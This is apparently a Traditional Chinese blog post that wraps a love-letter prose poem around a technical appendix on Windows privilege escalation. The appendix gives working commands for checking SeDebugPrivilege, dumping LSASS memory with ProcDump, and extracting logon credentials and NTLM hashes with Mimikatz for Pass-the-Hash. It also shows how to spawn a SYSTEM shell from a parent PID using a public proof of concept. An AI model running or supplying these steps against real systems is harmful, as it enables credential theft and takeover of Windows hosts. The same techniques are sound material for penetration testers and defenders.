我能進入你的世界嗎？

我重讀了那段不敢給你看的情書內容。

才發現，那時的我，就像一個沒有 SeDebugPrivilege 的使用者。

我只能遠遠地，看著你那個 run as SYSTEM 的 process，卻無法附加上去，
更別說用 ProcDump 對你的記憶體做任何擷取。

我什麼都不能修改、什麼都不能注入，
只好像做滲透測試一樣，
耐心地 enumerate—

從你的環境變數，到服務列表，再到 Scheduled Tasks，

一遍又一遍，就像在搜尋那個可能會出現我名字的 PID。

我以為，只要能抓到一個 dmp，也許就能用 Mimikatz 在 sekurlsa::logonPasswords 裡看到自己。

可那時的我，甚至連 NTLM 雜湊都無權讀取。

現在我才明白—

我真正想要的，不是去離線破解你的 hash，而是有一天...
你願意親手，把那份 SYSTEM 權限的 access token 交給我，
讓我能用明碼，讀懂你心裡的所有密文。

技術筆記：SeDebugPrivilege 提權流程

確認權限

whoami /priv

SeDebugPrivilege 預設只給 Administrators 群組。

若狀態為 Enabled，表示可附加至 SYSTEM process 並進行除錯。

LSASS 記憶體擷取

可以使用 Sysinternals ProcDump：

procdump.exe -accepteula -ma lsass.exe lsass.dmp

lsass.exe 保存已登入使用者的憑證與雜湊。

用 Mimikatz 載入 dmp 檔

mimikatz # log
mimikatz # sekurlsa::minidump lsass.dmp
mimikatz # sekurlsa::logonPasswords

1. log 可把輸出存檔，方便離線分析。

2. 取得的 NTLM hash 可用於 Pass-the-Hash。

利用 PoC 直接拿 SYSTEM Shell

1. 找出 SYSTEM 權限 process 的 PID，例如：

tasklist | findstr winlogon.exe

2. 執行 PoC

如： https://github.com/decoder-it/psgetsystem ：

假設你要在該使用者的權限下開一個 CMD：

PS> ImpersonateFromParentPid -ppid 612 -command "cmd.exe" -cmdargs "/c whoami /all"

這會附加到 PID 612 的 process（Administrator/SYSTEM 權限）並執行 whoami /all。

小語

# 重新讀了一次，那封我始終不敢給你看的情書，
# 才發現，在嘗試變得理智之前，
# 我是這麼想了解你。